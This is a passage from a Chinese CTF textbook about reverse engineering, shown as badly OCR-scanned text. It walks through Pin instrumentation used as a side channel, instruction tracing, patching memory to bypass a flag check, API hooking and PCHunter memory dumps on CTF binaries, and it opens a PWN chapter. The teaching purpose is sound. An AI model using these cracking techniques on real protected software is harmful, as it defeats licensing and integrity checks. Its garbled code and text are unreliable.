bbl_count = int(read_until(p.stdout, b'\n', drop=True)) 
#print( "payload:{} bbl:{}' .format(payload, bbl count)) 
p.terminate() 
return bbl_count 


check_charset(payload, charset): 
print('check: {}'.format(charset)) 
old_bbl count = 8 
bbl count = 8 
for i in range(len(charset)): 
ch = charset[i:i+*1] 
old_bbl_count = bbl_count 
bbl_ count = calc_ bbl(payload + ch) 
diff = bbl_count - 01d_bbl_count 
print('chr:{} bbl:{} diff:{}' .format(ch, bbl_count, diff)) 


main( ): 

charset = b'8123456789ABCDEFGHIIjKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'" 
charset += b'{}' 

charset += charset[9:1] 


图 5=7-=31 


calc _ bbl 使 用 subprocess 来 获得 程序 对 于 当前 Payload 执 行 的 基本 块 的 数目 ，check charset 会 遍历 有 
cnarset 
输出 结果 。 运 行 结果 见 图 ?5-7-32。 


图 5-7-32 


输入 为 3 时 ,执行 的 基本 块 数 与 其 他 输入 不 同 ， 可 以 考虑 用 diff=2 作 为 验证 标记 。 上 面 的 字符 集 的 开 
头 和 结束 都 为 0 的 原因 是 ， 如 果 “}” 是 正确 的 输入 ， 后 面 再 次 验证 0 时 必然 错误 ， 这 样 可 以 看 到 执行 
结果 的 变化 ， 方 便 验 证 。 


将 这 整个 流程 自动 化 后 ， 可 以 自动 算出 flag， 见 图 5-7-33。 将 flag 输 入 程序 ， 验 证 上 友 现 错误 ， 见 图 5-7 
-34。 


图 5-7-33 
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因为 在 flag 验 证 正确 后 会 额外 执行 一 些 工作 ， 执 行 的 基本 块 数目 的 差 值 不 只 是 2。 分 析 结 果 ， 我 们 发 现 
字母 b 可 能 为 正确 的 字符 ， 见 图 5-7-35。 补 全 flag， 验 证 通过 ， 见 图 5-7-36。 


加 5 7 35 


| 


图 5-7-36 


5.7.3.5 CTF 实 战 : 记录 指令 轨迹 


对 于 OLLVM 这 类 混淆 了 程序 控制 流 的 逆向 题 ， 若 直接 对 其 进行 分 析 会 非常 困难 ， 若 使 用 Pin 对 程序 执 
行 过 的 基本 块 进行 记录 ， 可 以 得 到 程序 的 执行 济 程 ， 从 而 对 我 们 的 逆 同 分 析 提 供 帮 助 。 


本 节 的 例题 为 看 雪 CTF 2018 的 逆向 题 : 叹息 之 墙 。 进 入 main 水 数 后 ， 在 IDA 的 流程 图 中 迎面 而 来 的 
束 是 一 面 让 人 叹 忆 的 墙 ， 见 图 5-7-37。 
我 们 考虑 借助 Pin 对 基本 块 进行 插 桩 ， 记 录 基 本 块 执行 的 流程 。 首 先 ， 恨 汤 MyRintoo| 寻 个 填 扩 a 
intoo 
项 目 ， 并 配置 好 环境 。 考 虑 到 可 配置 性 和 优化 性 能 ， 为 Pintool 加 入 3 个 可 配置 的 参数 ， 见 图 5-7 
-38。 


由 于 程序 运行 时 会 开启 ASLR， 基 址 会 与 /DA 中 的 不 同 ， 因 此 需要 传递 IDA 中 的 程序 基 址 ， 以 便 产 生 易 
于 分 析 的 日 志 。 考 虑 到 只 需 记 录 验 证 消 数 的 基本 块 执 行 流 程 ， 因 此 需要 传递 冰 数 的 边界 ， 既 可 以 减少 
记录 的 地 址 数量 ， 又 可 以 减少 性 能 损耗 。 


为 了 处 理 基 址 的 问题 ， 需 要 调用 IMG AddlnstrumentFunction 在 程序 镜像 加 载 时 进行 插 桩 ， 见 图 5- 
7-39。 其 中 translatelP 可 以 将 当前 地 址 转换 为 IDA 中 的 地 址 。 


随后 是 最 关键 的 记录 IP， 见 图 ?-7-40。 


myTrace 函 数 会 判断 当前 基本 块 的 P， 若 处 于 check 函 数 的 区 间 ， 则 进行 详细 处 理 。 (考虑 到 篇 幅 ， 
这 里 只 记录 执行 过 的 地 址 的 集合 ， 以 便 后 续 使 用 。 苟 需要 记录 指令 序列 ， 可 以 目 行 更 改 代码 。) 这 样 
我 们 束 完 成 了 一 个 简单 的 IP 记 录 的 Pintool， 编 译 运 行 ， 可 以 记录 执行 过 的 基本 块 ， 见 图 5-7-41。 
注 : out 为 打开 的 文件 流 ， 在 程序 结束 后 需要 关闭 out， 将 缓冲 区 的 数据 输出 到 文件 ， 否 则 有 信息 不 全 


的 问题 。 
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中 包括 被 记录 的 指令 到 5-7-42。 由 于 地 址 不 能 直观 地 体现 程序 执行 过 哪些 基 
和 ee 类 党 十 寺 的 全 玉民 了 本 央 全 凡人 避 外币 时 本 于 山下 
色 的 核心 代码 〈( 见 图 5-7-43， 完 整 脚本 见 附 录 ) 。 结 果 见 图 5-7-44。 


























































































































































































































































































































































































































图 5-7-37 


图 5-7-38 


UINT32 translateIP(ADDRINT ip) { 

// 地 址 转换 

return (UINT32)ip - imageBase + KnobDefaultImageBase.Value(); 
3 


void ImageLoad(IMG img, void* Vv) { 
// 若是 主 模块 则 记录 基 址 
if (IMG_ IsMainExecutable(img)) { 
imageBase = IMG LowAddress(img); 
} 
} 


图 5-7-39 


set<string> stringSet; 
void myTrace(ADDRINT ip) { 
char tmp[1624] ; 
UINT32 tIP = translateIP(ip); 
if (tIP >= KnobLeft.Value() && tIP < KnobRight.Value()) { 
snprintf(tmp, sizeof(tmp), "%p", tIP); 
string s(tmp); 
if (stringSet.find(s) == stringSet.end()) { 
stringSet.insert(s); 
*out << tmp 《< endl; 


VOID bblTrace(TRACE trace, VOID *V) { 
// 遍历 所 有 的 基本 块 
for (BBL bbl = TRACE BblHead(trace); BBL_Valid(bb1); bbl = BBL_ Next(bbl1)) { 
// 基本 块 执行 前 插入 函数 myTrace， 并 传递 当前 的 程序 基 址 
BBL_InsertCall(bbl, IPOINT_BEFORE, (AFUNPTR)myTrace, IARG_INST_PTR, 
IARG_END ) ; 


图 5-7-40 


图 5-7-41 
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0x409ff0 
0x40a003 
0x40a0bb 
0x40a0c0 
0x40a0d7 
0x40a0dc 
0x40a0f3 
0xX40a0f8 
Ox40al0f 
0x40all4d 
0x40al2b 
0x40al1l30 
0x40al147 
0x40aldc 
0x40al163 
0x40al168 
0x40al7f 
0x40al84 
0x40al9b 
Ox40ala0 
0x40alb7 
0x40albc 


OONAONDP 


图 5-7-42 


def color_block(ea，color=9x55ff7f) : 

p = idaapi.node_info_t() 
p.bg_color = color 
bb = find_bb(ea) 
bb_id = bb.id 
if is_colored[bb]: 

return False 
else: 

is_colored[bb] = True 
print(bb_id, hex(bb.startEA)) 
idaapi.set_node_info(fun_base, bb_id, p, idaapi.NIF_BG_COLOR | idaapi.NIF_FRAME_COLOR) 
idaapi.refresh_idaview_anyway() 
return True 


图 5-7-43 
得 到 执行 过 的 基本 块 信息 后 ,我们 可 以 方便 地 对 程序 算法 进行 分 析 。 如 果 熟 悉 !IDAPython， 我 们 还 能 
根据 基本 块 执行 次 数 对 执行 过 不 同 次 数 的 基本 块 进行 不 同 程度 的 上 色 。 限 于 篇 幅 ， 本 节 只 介绍 如 何 使 
用 Pin 记 录 指 令 执 行 过程 ， 不 对 叹息 之 墙 的 算法 进行 更 具体 的 分 析 。 


图 5-7-44 


5.7.3.6 CTF 实 战 : 记录 指令 执行 信息 与 修改 内 存 


在 CTF 中 ， 有 些 虚 拟 机 类 的 逆 同 题 会 专门 实现 cmp 捐 令 ， 从 而 完成 对 数据 的 比较 。 这 时 可 以 考虑 使 用 
Pin 对 这 类 指令 进行 揪 柱 ， 记 录 比 较 的 内 容 ， 从 而 猜测 被 逆 程 序 的 内 部 算法 。 


??_R4REQQ6B@ ; const RE:: RTTI Complete Object 
; const RE:: vftable' 
??_7RE@@6B@ dd offset sub 4616A6 ; DATA XREF: sub 4616A6+461o 
dd offset Sub_461666 
dd offset sub 481188 
dd offset Sub_461656 


EE EE 和 Po 
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SuUD_4o127D 
sub 461196 
sub_4611C6 
sub_461256 
sub_461296 
sub_4612C6 
sub_4611F6 
sub_461226 
sub_4612F6 
sub_461376 
sub _ 461396 
sub_461316 
sub 461356 
sub_4613B6 
sub_461466 


图 5-7-45 


UO OS SI dN ULE EA SUS Ey 


17-47。 


a) 


_thiscall sub 461466(_DWORD *this) 


llunsigned int 


_DWORD *v1; // 
Int v2;: // esi 


edi1 


unsigned int v3; // esi 
unsigned int v4; // esi 
unsigned int result; // eax 


PP。 < < 
“hh b> 


8， 


_ thiscall **)( DWORD *))(*v1 
int ( thiscall **)( DWORD *))(*v1 


时 


(int (_ thiscall **)( DWORD *))(*v1 


EUUUCOUOUE en 


int (**)(void))(*this + 12))(); 
int (_ thiscall **)( DWORD *))(*v1 


+ 4))(v1) == v2 ) 


+ 12))(v1); 
+ 4))(v1) < v3 ) 


+ 12))(v1); 


= (*(int (_ thiscall **)(_DWORD *))(*v1 + 4))(v1); 


v1[9] += 2; 


if ( result > v4 ) 


v1i[5] = 1; 
return result; 


.text:69646061466 
.二 ext:904601466 
.七 ext :8906461466 
.上 ext :0909491461 
.text:00401462 
.text:080401464 
.text:08049014866 
.七 ext :09606401469 
.text:004901486B 
.text:080401486D 
.二 ext:994606146F 
.text:080401412 
.七 Ext :869461414 
.七 ext :9899401416 
.七 ext :909940141D 
.text:9646141D 
.二 ext:90460141D 
.二 ext:969646141F 
.七 ext :0909401421 
.七 ext :8906401424 
.二 ext:909401426 
.上 ext:904601428 
.text:0040142A 
.text:88460142D 
.七 ext :89646142F 
.七 ext :8906461431 
.text:00401438 
.text:0600401438 
.二 ext:99461438 
.十 Ext :9646143A 


loc_48141D: 


loc 461438: 


图 5-7-46 


proc near .rdata:6964632241o 
esi 

edi 

edi, ecx 

eax, [edi] 

dword ptr [eax+8Ch] 
edx, [edi] 

ecx, edi 

esi, eax 
dword—ptr—[{edx+4] 

eax, esi 

short loc 46141D 

dword ptr [edi+14h], 8 


; DATA XREF: 


; CODE XREF: sub 461466+141] 
eax, [edi] 
ecx, edi 
dword ptr [eax+8Ch] 
edx, [edi] 
ecx, edi 
esi, eax 
dword ptr [edx+4] 
eax, esi 
short loc 461438 
dword ptr [edi+14h], 8@FFFFFFFFh 


; CODE XREF: sub_461466+2F1j 
eax, [edi] 
ecx, edi 


图 5-7-47 


考虑 使 用 指令 级 插 桩 INS AddlnstrumentFunction 对 地 址 0x401412 的 cmp 指 令 进 行 揪 桩 ， 记 录 eax 


和 esi 的 值 ， 见 图 5-7-48。 


其 中 ，translatelP 将 当前 的 指令 地 址 转换 为 IDA 中 的 指令 地 址 ，IARG_REG_VALUE 可 以 指定 将 寄存 


器 传 入 要 插入 的 阔 数 。 


编写 完成 后 ， 对 程序 进行 播 桩 测试 。 


注 : 输入 长 度 为 48 目 为 大 写字 母 和 数字 ， 条 件 来 源 需要 读者 自行 分 析 。 
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void logCMP(ADDRINT eax, ADDRINT esi) { 
char tmp[1624] ; 
snprintf(tmp, sizeof(tmp), "cmp %p, %p", eax, esi); 
*out << tmp << endl]l,; 


void insTrace(INS ins, VOID +*v) { 
// 在 8@x481412 的 cmp 执 行 后 插入 函数 logCMP 
if (translateIP(INS Address(ins)) == 9x461412) { 
// 将 eax，esi 传 递 给 logCMP 
INS_InsertCall(ins, IPOINT_AFTER, (AFUNPTR)logCMP, 
IARG REG VALUE, REG_ EAX, 
IARG_ REG VALUE, REG ESI, 
IARG_END ) ; 


图 5-7-48 
首先 ， 假 设 flag 为 


随后 用 Pintooli 记 录 运 行 信 息 ， 见 图 ?-7-49。 日 志文 件 的 内 容 见 图 ?5-7-50。 


0x42, 
0x42, 0x46 
xaA42. 0x38 
Bzx42 Ox39 
0x41, 0X39 
Dx0 "0x0 
0x43, 0x0 
0x43, 0x46 
0x43. 0x30 
0x43, 0x39 
0x41, 0xX39 
0x0, 0x0 
0x13, 0xa 
日 式 1 2 0xa 
0x11，0xa 
0xX11， 0xa 
0x11，0xa 
0X11， 0xa 
Bxill 也 x3 


cmp Ob: Uxa 
| | 0xcbaaaaaa 0xebbaa84d 


ength:4,315 lines:298 Ln:291 Col:12 Sel:0|0 
图 5-7-50 
最 后 一 次 比较 的 内 容 为 0xcbaaaaaa 和 0xebbaa84d， 由 于 0xcbaaaaaa 恰 好 为 输入 的 flag 的 后 8 字 节 ， 
青 测 0xebbaa84d 为 真实 flag 的 后 8 字 节 。 


改变 输入 为 


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADH8AABBE 


进行 调试 ， 得 到 的 日 志文 件 见 图 5-7-51。 


0xl1l2, 0Xa 

0xll1l, Oxa 

Oxl1ll1l, Oxa 

0x8, Oxa 

0x4, 0Xa 

0X14， Oxa 

Oxebbaa84d, Oxebbaa84d 
0X1L1， Oxa 


No- N= 一 
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Ca Fr UZXd 


Oxll1l, 0Xa 
0X1L1， 0Xa 
0X11， 0Xa 
0X1L1， 0Xa 
Oxll1l, 0Xa 
Oxll1l, 0Xa 
Oxaaaaaaaa, Ox53dc2c9f 


图 5-7-51 
多 进行 儿 次 测试 ， 基 本 可 以 确认 最 后 就 是 与 真正 的 flag 进 行 比 较 。 


我 们 现在 可 以 手工 把 flag “ 套 ” 出 来 了 ， 但 是 使 用 Pin 可 以 把 这 个 步骤 目 动 化 。 


仔细 观察 sub_401400 会 友 现 ， 当 比较 结果 相等 时 ，v1[5]=0， 考 虑 用 Pin 修 改 比较 后 的 结果 ， 目 动 套 
出 所 有 flag。 


观察 sub 401400 后 半 部 分 ( 见 图 ?5-7-52) ， 不 论 如 何 执行 ， 都 会 执行 到 0x401457， 所 以 在 这 个 位 
置 插 杜 ， 在 比较 flag 时 将 v1[5] 修 改 为 0， 自 动 化 记录 flag.。 


esi, eax 

dword ptr [edx+4] 

eax, esi 

short loc 4861438 

dword ptr [edi+14h], OFFFFFFFFh 


10oc_461438 : ; CODE XREF: Sub_461466+2FT] 
eax，[edi] 
ecx, edi 
dword ptr [eax+8Ch] 
edx，[edi] 
ecx, edi 
esi, eax 
dword ptr [edx+4] 
dword ptr [edi+24h], 2 
eax, esi 
short loc 481457 
dword ptr [edi+14h], 1 


loc_461457: ; CODE XREF: sub_461466+4E1Tj 
edi 
esi 


sub_481488 
图 5-7-52 


具体 实现 见 图 ?5-7-53。 


观察 日 志 ， 进 行 flag 比 较 时 ，esi 大 于 0xff， 此 时 把 比较 的 flag 仔 入 全 局 变量 flag。 随后 在 0x401457 的 
指令 执行 前 插入 遂 数 editResult， 由 于 v1 的 地 址 存在 edi 中 ， 因 此 需要 传递 edi 给 疯 数 ， 同 时 需要 eax 
判断 当前 正在 比较 的 是 否 为 flag。editResult 的 具体 实现 见 图 5-7-54。 


string flag; 


void logCMP(ADDRINT eax, ADDRINT esi) { 
char tmp[18624]; 
snprintf(tmp, sizeof(tmp), "cmp %p, %p", eax, esi); 
*out “< tmp “< endl; 
// 进行 flag 比 较 时 自动 化 的 记录 flag， 存 入 全 局 变量 
if (esi >= 9xff) { 
snprintf(tmp, sizeof(tmp), "%X", esi); 
flag += string(tmp); 
S 
} 


void insTrace(INS ins, VOID *v) { 
// 在 ex481412 的 cmp 执 行 后 插入 函数 logCMP 
if (translateIP(INS _Address(ins)) == 96x461412) { 
INS_InsertCall(ins, IPOINT_AFTER, (AFUNPTR)1logCMP, 
IARG_REG_VALUE, REG_EAX, 
IARG_REG_VALUE, REG_ESI, 
IARG_END); 


} 
else if (translateIP(INS Address(ins)) == 8x884861457) { 
INS_InsertCall(ins, IPOINT_BEFORE, (AFUNPTR)editResult, 
IARG_REG_VALUE, REG_EAX, 
IARG_REG VALUE, REG_EDI, 
IARG_END); 
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5-7-53 
VOID Fini(INT32 code, VOID *#V 
// 打印 flag 
reverse(flag.begin(), flag.end()); 
*+out “< flag << endl; 


void editResult(ADDRINT eax, ADDRINT edi) { 
char tmpStr[1624] ; 
ADDRINT tmpl = 8, tmp2 = 8,; 
// 备份 v1[5] 的 内 容 ， 其 实 可 以 删 去 
PIN_SafeCopy(&tmpl1, (void*)(edi+8x14), sizeof(ADDRINT)); 
// 若是 进行 flag 的 判断 则 eax>=6xff， 此 时 独 盖 v1[5] 为 8 
if (eax >= Oxff) 
PIN_SafeCopy( (void*)(edi+6x14), &tmp2, sizeof(ADDRINT)); 
// 记录 v1[5] 方 便 调 试 
snprintf(tmpStr, sizeof(tmpStr), "old Data: %p", *(ADDRINT*)(edi + 8x14)); 
*out << tmpStr << endl; 


图 5-7-54 


由 于 我 们 的 Pintoo 仁 程序 运行 在 同一 个 地 址 空间 ， 奉 需要 修改 内 仔 ， 可 以 直接 通过 memcpy 完 成 ， 
但 是 Pin 不 推荐 这 么 做 ， 推 荐 使 用 更 安全 的 冰 数 PIN_SafeCopy。 该 轴 数 在 碰 到 不 可 访问 的 地 址 时 不 
会 报 段 错误 一 类 的 信息 。 分 析 泡 编 可 以 得 各 ，v1[5] 对 应 的 内 仓 地 址 为 edi+0x14， 大 当前 比较 的 数据 
是 flag， 则 将 v1[3] 设 置 为 0， 让 程序 认为 比较 正确 ， 进 而 可 以 得 到 后 续 的 flag。 由 于 flag 是 倒序 进行 比 
较 的 ， 变 量 flag 中 存 的 数据 是 倒序 的 ， 在 输出 时 需要 对 其 进行 reverse。 


随后 用 新 生成 的 Pintool 对 题目 进行 插 桩 ， 见 图 5-7-55。 


图 5-=7-55 


此 处 程序 已 经 认为 输入 的 flag 是 正确 的 ， 因 为 Pintoo| 将 flag 的 比较 结果 设置 为 正确 了 。 


Pintool 生 成 的 日 志文 件 见 图 5-7-56。 


加 log. log 回 

cmp Oxaaaaaaaa, Ox8e39b869 
old Data: 0x0 

cmp Oxll, Oxa 

old Data: Oxl 

cmp Oxll, Oxa 

old Data: 0xl 

cmp Oxll, Oxa 

old Data: Oxl 

cmp Oxll, Oxa 

old Data: 0xX1 

cmp Oxll, Oxa 

old Data: 0xX1 

cmp Oxll, Oxa 

old Data: 0xl 

cmp Oxll, Oxa 

old Data: Oxl 

cmp Oxl1l, Oxa 

old Data: Oxl 

cmp Oxaaaaaaaa, 0x9ad8443a 
old Data: 0x0 
A3448DA9968B93E88CD1ACF7D576BCE6F9C2CD35D48AABBE 


图 5-7-56 


可 以 友 现 ，flag 已 经 被 写 入 日 志文 件 ， 使 用 计算 出 的 flag 在 不 进行 插 桩 的 情况 输入 题目 ， 验 证 通 
见 图 2?-7-27。 这 样 ， 我 们 几乎 不 需要 对 程序 内 部 逻辑 进行 逆 癌 ， 使 用 Pin 残 可 以 轻松 做 出 一 个 虚拟 机 
的 耶 癌 题 。 


Pin 可 以 记录 指令 的 执行 信息 、 修 改 内 存 ， 并 且 其 应 用 场景 不 只 有 虚拟 机 ， 更 多 的 应 用 场景 需要 读者 


https://weread.qq.com/web/reader/77d32500721a485577d8eeekd67323c0227d67d8ab4fb04 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读 书 


i 


图 5=7-=57 


5.7.3.7 Pin 小 结 


Pin 是 一 个 十 分 强大 的 插 桩 工具 ， 与 1DA 一 样 ， 同 一 个 软件 在 不 同 的 人 手中 会 友 挥 不 一 样 的 功效 。 古 人 
云 : 工 欲 善 其 事 ， 必 移 利 其 器 。 由 于 篇 幅 有 限 ， 本 节 介 绍 的 Pin 的 用 法 只 是 “冰山 一 角 ”， 真 正 的 CTF 
是 没有 套路 的 ， 只 有 勤 查 文档 ， 开 拓 思 路 ， 才 能 在 CTF 中 将 Pin 友 挥 出 最 大 的 作用 。 
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5.8 耶 癌 中 的 特殊 技巧 


在 逆向 过 程 中 ， 平 时 在 其 他 领域 应 用 的 某 些 技术 可 以 发 挥 意 想不到 的 作用 。 实 际 上 ， 考 察 这 类 技术 的 
题目 更 应 该 被 归 为 来 项 题 。 下 面 倍 要 介绍 CTF 中 曾经 出 现 的 小 技巧。 


5 .8.1 Hook 


Hook， 即 “ 钧 子 ”， 在 逆向 工程 中 指 将 某 毕 尔 数 “ 钧 ” 住 ， 蔡 换 为 目 己 编写 的 函数 。 不 难看 出 ， 这 
有 扣 类 似 插 桩 ， 但 是 不 需要 复 玉 的 插 桩 框架 ， 且 执行 速度 损失 很 小 。 


下 面 以 TMCTF 2017 的 Reverse 400 的 题目 为 例 。 题 目 第 一 层 是 一 个 屏幕 键盘 ( 见 图 5-8-1) ， 每 隔 
秒 钟 ， 字 符 的 顺序 会 变动 一 次 ， 然 后 鼠标 会 移动 到 某 个 按钮 上 。 程 序 加 了 VMProtect 保 护 ， 因 此 在 
时 间 内 逆向 的 可 能 性 极 小 ， 所 以 需 用 其 他 操作 来 获取 所 有 的 值 。 


VMProtect 在 遇 到 系统 的 API 调 用 时 会 退出 虚拟 机 ， 所 以 我 们 可 以 使 用 Hook。 通 过 Hook sleepEx 子 
数 ， 可 以 让 变化 的 速度 加 快 (类 似 变速 齿轮 ) ， 由 于 移动 鼠标 需要 使 用 SetCursorPos 的 APl, 因此 
住 它 来 获取 每 轮 的 数据 。 这 样 惑 可 以 获得 所 有 的 数据 。 重 组 后 ， 即 可 得 到 程序 的 第 二 层 文 件 。 


5.8.2 巧妙 利用 程序 已 有 代码 


当 编 译 器 优化 不 充分 时 ， 在 编译 合 有 库 的 程序 时 会 把 整个 库 编译 进 二 进 制 文 件 ， 这 导致 某 些 六 数 没有 
馈 用 到 ， 却 出 现在 程序 中 。 由 于 库 在 编写 的 时 候 需 要 考虑 完备 性 ,许多 加 解密 函数 往往 成 对 出 现 ， 它 
们 通 弟 会 补 一 起 编译 进程 序 中 ，。 


例如 *CTF 2019 的 逆向 题 fanoGo， 出 题 人 用 Golang 写 了 一 个 香农 范 诺 编码 的 算法 ， 却 把 解码 的 函数 
也 放 进 去 了 ， 见 图 ?-8-2。 


更 巧 的 是 ， 这 两 个 图 数 的 原型 极其 相似 : 


void __cdecl fano___Fano__Decode(fano_Fano_9 *f, string Bytes, string _rl) 
void __cdecl fano___Fano__Encode(fano_Fano_0 *f, string plain, string _r1) 


9 以 看 到 第 二 个 参数 都 是 string。 我 们 甚至 只 需 将 call fano ”Fano Decode 修 改 为 call fano 
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Encode， 即 可 得 到 正确 的 输入 。 


IfIfano___Fano__Fano_init 
IfIfano___Fano__fano_sort 
IfIfano___Fano__times0fChars 
IfIfano___Fano__fano_generate 
IfIfano_Bytes2str 

Iflfano___Fano_ Decode So—— 
于 |fano_o9tr2Bytes 


可 fano___Fano__Encode So— 


fano_init 


5.8.3 Dump 内 存 


这 种 做 法 实际 上 是 “ 降 维 打击 ”: 每 个 程序 运行 的 环境 都 是 由 相应 的 更 “高 等 级 ”的 系统 提供 的 ， 如 
可 执行 文件 的 运行 环境 由 操作 系统 提供 、 操 作 系统 的 运行 环境 由 虚拟 机 提供 (如果 是 虚拟 机 系统 ) 。 
在 CTF 中 ， 可 以 使 用 权限 更 局 、 层 级 更 高 的 工具 查看 程序 的 内 仓 ， 从 而 观察 程序 运行 的 中 间 结 果 ， 借 
此 来 查看 其 中 是 否 有 flag， 或 者 是 否 包 合 需 要 的 程序 数据 。 这 也 是 一 种 趣味 性 很 强 的 方法 ， 具 体 做 ; 
多 种 多 样 。 


对 于 Windows 系 统 ， 查 看 用 户 态 程序 内 仓 ， 可 以 使 用 调试 器 ; 而 要 查看 内 核 驱 动 的 内 存 ， 则 可 以 使 用 
高 级 的 内 核 级 系统 维护 工具 ， 如 PCHunter。 曾经 在 HCTF 线 下 赛 中 有 一 道 逆向 题 ， i LE Nb 

保护 。VMProtect 是 一 个 极其 复杂 ， 保 护 强 度 很 高 的 过， 这 阻止 了 选手 在 短 时 间 内 逆向 出 程序 算 
法 。 这 种 题 看 起 来 极其 困难 ， 但 实际 上 可 以 直接 使 用 PCHunter 来 Dump 出 对 应 驱动 的 内 存 ， 然 后 全 
局 搜索 字符 串 ， 即 可 找到 flag。 ( 注 : PCHunter 软 件 可 在 http://www.xuetr.com/? p=191 下 
载 。 注 意 ，PCHunter 虽 然 支 持 Windows 10， 但 由 于 Windows 10 更 新 速度 过 快 ， 作 者 经 常 无 法 及 让 
更 新 软件 。 堆 至 本 书 编 写 时 ，Windows 10 已 经 更 新 至 1909 和 版 本 ， 而 PCHunter 文 持 的 版 本 仍然 停留 
在 1809。 推 荐 大 家 平时 常备 版 本 较 低 的 Windows 虚 拟 机 。 ) 


而 对 于 Mac 和 Linux 系 统 ， 若 要 查看 用 尸 态 程序 的 内 存 ， 同 样 可 以 使 用 调试 器 ; 但 若 要 查看 内 核 的 内 
仔 ， 由 于 种 种 历史 原因 ， 这 些 系统 缺少 相应 的 内 核 级 系统 维护 工具 ， 所 以 我 们 只 能 借助 虚拟 机 这 一 更 
“高 级 的 ”系统 来 查看 。 以 Mac 系 统 为 例 ，CISCN 2018 的 一 道 杂项 题 是 memory-forensic， 提 供 了 
比较 复杂 的 macOS 的 内 核 扩 展 (kext) ， 需 要 计算 flag， 然 后 panic。 但 是 我 们 并 不 知道 如 何 Dump 
macOS 的 内 存 。 我 们 可 以 通过 修改 macOS 的 boot-args 来 开启 调试 日 志 并 禁用 自动 重启 : nvram 

-args= "debug=0x546 kcsuffix=development pmuflags=1 kext-dev-mode=1 slide=0 
kdp_match_ name=en0-v"， 这 样 在 题目 程序 触 友 panic 后 可 以 让 系统 保持 这 个 状态 供 我 们 调试 ， 
从 而 让 我 们 能 更 方便 地 抓 取 内 存 内 容 。VMware 的 虚拟 机 内 存 是 保存 在 硬盘 的 vrmem 文 件 中 的 ， 故 5 
以 直接 打开 macOs 虚 拟 机 的 vmem 文 件 ， 搜 索 “CISCN{” 即 可 得 到 flag。 
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有 时 会 遇 到 利用 内 核 驱动 防止 自己 被 调试 的 题目 。 拟 态 防 御 线 下 赛 的 一 个 逆向 题 是 驱动 配合 的 ， 驱 动 
会 修改 进程 栈 上 的 一 个 迷宫 数组 ， 同 时 会 做 一 些 Rootkit 的 类 似 操 作 ， 如 隐藏 进程 、 驱 动 反 调 试 、 和 

并 防止 打开 进程 等 。 程 序 的 后 续 验 证 算法 很 简单 ， 就 是 wasd 走 迷宫 ， 所 以 关键 是 如 何 获 得 真正 的 
迷 官 数组 。 我 们 可 以 使 用 内 核 调 试 ， 也 可 以 通过 PCHunteI 来 从 内 存 入 手 绕 开 驱动 的 保护 。PCHunte 
可 以 查看 某 个 进程 的 线程 列表 ， 并 获得 TEB 的 地 址 信息 ， 见 图 5-8-3。 


[MSASCuiL.exe] 进 程 线程 (1) \ 
线 和 Id |ETHREAD |Teb | 优 .| 线程 .| 模块 “| 切 .… | 线程 .. 


OxFFFFDB87EDAFD700 “0x0000001FEF359000 10 0x00..，MSAS..，389 ”等 和 








1116 608 C:\Windows\System32\dwm,.exe OxFFFFDBS7E... 
R37 PNR FF" Windmva\Svestem 37\fnntdrvuhnest eve MvFFFFNRAYE 


图 5-8-3 
TEB+8 偏 移 处 的 StackBase 成 员 即 这 个 线程 对 应 的 栈 地 址 ， 见 图 5-8-4。 我 们 可 以 Dump TEB 的 内 
仔 ， 得 到 Stack 的 地 址 信息 ， 继 续 Dump 程 序 对 应 地 址 的 栈 ， 即 得 到 目标 迷宫 数组 。 


struct NT_TIB 


typedef struct NT TIB 
人 


RD ExceptionList.; 


PVOID StackBase: 
PVOID StackLimit: 
PVOID SubSystemTib: 
unlion 


{ 


PVOID FiberData: 
ULONG Version: 
上 
PVOID ArbitraryUserPointer: 
PNT TIB Self:; 
} NT _ TIB, x*PNT TIB: 


图 5-8-4 
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小 结 


本 章 介 绍 了 CTF 中 常用 的 逆向 工具 及 方法 ， 但 是 CTF 中 的 逆向 可 能 远 不 止 这 么 简单 ， 有 时 候 甚至 会 
现 一 些 无 法 运行 、 反 编译 的 题目 ， 这 些 题目 可 能 是 loT 固 件 ， 也 可 能 是 非常 罕见 的 架构 ， 如 办 
ielwiila 
。 面 对 这 些 非 “套路 ” 题 ， 人 参赛 者 的 基本 功 和 应 变 能 力 将 得 到 考验 。 


笔者 认为 ， 逆 向 没有 所 谓 的 “套路 ”， 只 有 真正 熟悉 程序 的 运行 机 理 ， 熟 悉 各 种 系统 、 架 构 的 特性 、 
各 种 加 解密 方法 ， 才 能 企 解 决 逆 癌 题 的 时 候 更 加 得 心 应 手 。 
CTF 还 是 实际 工作 ， 六 向 最 重要 的 是 实际 操作 、 积 罕 经 验 ， 这 样 才能 获得 提升 。 硕 望 读 者 在 读 
内 容 后 能 有 所 收获 ， 同 时 勤 加 练习 ， 在 日 后 的 比赛 、 实 际 工作 中 将 这 些 内 容 融 会 贯通 ， 最 终 成 
/一 名 逆 问 界 的 精英 选手 。 
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第 6 章 PWN 


读者 可 能 对 “PWN” 这 个 词 有 所 疑惑 。 因 为 “PWN ”不 像 Web 或 者 CRYPTO 一 样 代 表 具 体 的 意思 。 
实际 上 ，“PWN ”是 一 个 拟 声 词 ， 代 表 黑 客 通过 漏洞 攻击 获得 计算 机 权限 的 “ 丰 ”的 声音 ， 还 有 一 种 
况 法 是 “PWN ”来 源 于 控制 计算 机 的 “own ”这 个 词 。 总 之 ， 通 过 二 进 制 漏洞 获取 计算 机 权限 的 方 
法 或 者 过 程 补 称 为 PWN.。 
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oA/N Bas 


6.1.1 什么 是 PWN 


在 CTF 中 ，PWN 主 要 通过 利用 程序 中 的 漏洞 造成 内 人 存 破坏 以 获取 远程 计算 机 的 shell， 从 而 获得 flag。 
PWN 题 目 比 较 常 见 的 形式 是 把 一 个 用 C/C+ + 语言 编写 的 可 执行 程序 运行 在 目标 服务 器 上 ， 参 赛 者 通 
过 网 络 与 服务 器 进行 数据 交互 。 因 为 题目 中 一 般 存 在 漏洞 ， 攻 击 者 可 以 构造 恶意 数据 发 送 给 远程 服务 
器 的 程序 ， 导 致远 程 服务 器 程序 执行 攻击 者 希望 的 代码 ， 从 而 控制 远程 服务 器 。 


6.1.2 如 何 学 习 PWN 


逆向 工程 是 PWN 的 基础 ， 二 者 的 知识 结构 差不多 。 所 以 ， 有 时 会 用 一 过 抽 安 全 来 消 作 这 门 工程 和 

